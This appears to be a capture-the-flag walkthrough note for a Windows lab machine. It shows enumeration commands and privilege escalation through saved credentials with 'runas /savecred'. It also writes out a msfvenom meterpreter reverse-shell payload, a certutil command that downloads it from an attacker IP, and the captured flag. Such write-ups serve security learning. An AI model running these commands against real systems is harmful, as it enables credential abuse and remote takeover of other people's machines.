#10.10.10.98
-------------
#inside telnet
#check all folder
dir /a	     (checks for hidden folder)
dir /s 	     (list all files recursively with their path)

#there is hidden 'Desktop' folder inside Public dir 
#inside c:\Users\Public\Desktop\  there is .lnk file
#analyse that file
type "ZKAccess3.5 Security System.lnk"
#runas.exe command is used on that file     (runas ==  sudo cmd of linux)
#read about runas command    -->	https://ss64.com/nt/runas.html

cmdkey /list 
#This one will revealed any saved cached credentials that the user session had stored on their own

-----------------------------------------------------------------------------
#1st method : getting key directly by copying the content from root.txt to another file   (used method)

runas /savecred /user:Administrator "cmd /V:on /C type C:\Users\Administrator\Desktop\root.txt > c:\Users\Security\file"

# runAs : it is a command like sudo for windows
# /savecred : bypass administrator password

------------------------------------------------------------------------------
#2nd method : getting shell using reverse shell by uploading windows payload

#msfvenom for payload creation
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<my ip> lport=4444 -f exe > shell.exe
#certutil for uploading payload
certutil -urlcache -split -f http://10.10.14.181/shell.exe shell.exe

#execute it using runas
runas /savecred /user:ACCESS\Administrator shell.exe
------------------------------------------------------------------------------

#key
6e1586cc7ab230a8d297e8f933d904cf
